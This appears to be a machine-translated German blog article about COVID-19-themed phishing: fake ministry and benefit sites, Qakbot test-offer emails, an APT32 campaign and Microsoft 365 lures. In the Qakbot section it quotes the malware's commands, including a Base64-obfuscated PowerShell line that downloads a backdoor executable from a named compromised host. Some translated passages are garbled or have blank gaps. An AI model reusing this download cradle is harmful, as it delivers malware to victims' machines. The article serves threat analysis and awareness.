Angreifer machen sich das Thema COVID-19 weiterhin zunutze und stellen immer mehr Bedrohungen für Benutzer dar, die sich für alles rund um die Epidemie interessieren. IN Wir haben bereits darüber gesprochen, welche Arten von Malware im Zuge des Coronavirus aufgetaucht sind, und heute werden wir über Social-Engineering-Techniken sprechen, mit denen Benutzer in verschiedenen Ländern, darunter auch Russland, bereits konfrontiert wurden. Allgemeine Trends und Beispiele stehen unter dem Strich.
Denken Sie daran Wir haben darüber gesprochen, dass die Menschen bereit sind, nicht nur über das Coronavirus und den Verlauf der Epidemie, sondern auch über finanzielle Unterstützungsmaßnahmen zu lesen? Hier ist ein gutes Beispiel. Im deutschen Bundesland Nordrhein-Westfalen bzw. NRW wurde ein interessanter Phishing-Angriff entdeckt. Die Angreifer erstellten Kopien der Website des Wirtschaftsministeriums (), wo jeder finanzielle Unterstützung beantragen kann. Ein solches Programm gibt es tatsächlich und es hat sich für Betrüger als nützlich erwiesen. Nachdem sie die persönlichen Daten ihrer Opfer erhalten hatten, stellten sie einen Antrag auf der Website des echten Ministeriums, gaben jedoch andere Bankdaten an. Nach offiziellen Angaben wurden bis zur Entdeckung des Plans 4 solcher Fake-Anfragen gestellt. Dadurch fielen 109 Millionen US-Dollar, die für betroffene Bürger bestimmt waren, in die Hände von Betrügern.
Möchten Sie einen kostenlosen Test auf COVID-19?
Ein weiteres wichtiges Beispiel für Phishing mit Coronavirus-Thema war in E-Mails. Die Nachrichten erregten die Aufmerksamkeit der Nutzer mit dem Angebot, sich kostenlos auf eine Coronavirus-Infektion testen zu lassen. Im Anhang dazu Es gab Fälle von Trickbot/Qakbot/Qbot. Und als diejenigen, die ihren Gesundheitszustand überprüfen wollten, begannen, „das beigefügte Formular auszufüllen“, wurde ein bösartiges Skript auf den Computer heruntergeladen. Und um Sandbox-Tests zu vermeiden, begann das Skript erst nach einiger Zeit mit dem Herunterladen des Hauptvirus, als die Schutzsysteme davon überzeugt waren, dass keine schädlichen Aktivitäten auftreten würden.
Es war auch einfach, die meisten Benutzer davon zu überzeugen, Makros zu aktivieren. Dabei kam ein Standardtrick zum Einsatz: Um den Fragebogen auszufüllen, müssen Sie zunächst Makros aktivieren, also ein VBA-Skript ausführen.
Wie Sie sehen, ist das VBA-Skript speziell vor Antivirenprogrammen maskiert.
Windows verfügt über eine Wartefunktion, bei der die Anwendung /T <Sekunden> wartet, bevor sie die Standardantwort „Ja“ akzeptiert. In unserem Fall wartete das Skript 65 Sekunden, bevor es temporäre Dateien löschte:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Und während des Wartens wurde Malware heruntergeladen. Hierzu wurde ein spezielles PowerShell-Skript gestartet:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Nach der Dekodierung des Base64-Werts lädt das PowerShell-Skript die Backdoor herunter, die sich auf dem zuvor gehackten Webserver aus Deutschland befindet:
http://automatischer-staubsauger.com/feature/777777.pngund speichert es unter dem Namen:
C:UsersPublictmpdirfile1.exe
Mappe ‘C:UsersPublictmpdir’ wird gelöscht, wenn die Datei „tmps1.bat“ ausgeführt wird, die den Befehl enthält cmd /c mkdir ""C:UsersPublictmpdir"".
Gezielter Angriff auf staatliche Stellen
Darüber hinaus berichteten FireEye-Analysten kürzlich über einen gezielten APT32-Angriff, der auf Regierungsstrukturen in Wuhan sowie auf das chinesische Ministerium für Notfallmanagement abzielte. Eines der verteilten RTFs enthielt einen Link zu einem Artikel der New York Times mit dem Titel . Beim Lesen wurde jedoch Malware heruntergeladen (FireEye-Analysten identifizierten die Instanz als METALJACK).
Interessanterweise hat laut Virustotal zum Zeitpunkt der Entdeckung keines der Antivirenprogramme diese Instanz erkannt.
Wenn offizielle Websites offline sind
Das auffälligste Beispiel eines Phishing-Angriffs ereignete sich neulich in Russland. Grund dafür war die Ernennung einer lang erwarteten Leistung für Kinder im Alter von 3 bis 16 Jahren. Als am 12. Mai 2020 der Beginn der Annahme von Anträgen bekannt gegeben wurde, strömten Millionen auf die Website des Staatsdienstes, um die lang erwartete Hilfe zu erhalten, und brachten das Portal nicht schlimmer zum Absturz als einen professionellen DDoS-Angriff. Als der Präsident sagte, dass „die Regierungsbehörden den Bewerbungsfluss nicht bewältigen könnten“, begann man online über die Einführung einer alternativen Website für die Annahme von Bewerbungen zu sprechen.
Das Problem besteht darin, dass mehrere Websites gleichzeitig ihre Arbeit aufgenommen haben, und während eine, die echte unter posobie16.gosuslugi.ru, tatsächlich Bewerbungen akzeptiert, sind es noch mehr .
Kollegen von SearchInform haben etwa 30 neue betrügerische Domains in der .ru-Zone gefunden. Infosecurity und Softline Company haben seit Anfang April mehr als 70 ähnliche gefälschte Websites von Regierungsdiensten aufgespürt. Ihre Schöpfer manipulieren bekannte Symbole und verwenden auch Kombinationen der Wörter gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie und so weiter.
Hype und Social Engineering
All diese Beispiele bestätigen nur, dass es Angreifern gelingt, das Thema Coronavirus erfolgreich zu monetarisieren. Und je höher die sozialen Spannungen und je unklarer die Sachlage, desto größer sind die Chancen für Betrüger, wichtige Daten zu stehlen, Menschen dazu zu zwingen, ihr Geld aus eigener Tasche herauszugeben, oder einfach mehr Computer zu hacken.
Und da die Pandemie möglicherweise unvorbereitete Menschen dazu gezwungen hat, massenhaft von zu Hause aus zu arbeiten, sind nicht nur persönliche, sondern auch Unternehmensdaten gefährdet. Beispielsweise waren kürzlich auch Benutzer von Microsoft 365 (ehemals Office 365) einem Phishing-Angriff ausgesetzt. Die Menschen erhielten massenhaft „verpasste“ Sprachnachrichten als Anhänge zu Briefen. Bei den Dateien handelte es sich jedoch tatsächlich um eine HTML-Seite, zu der die Opfer des Angriffs weitergeleitet wurden . Dies führt zum Verlust des Zugriffs und zur Kompromittierung aller Daten des Kontos.
Source: habr.com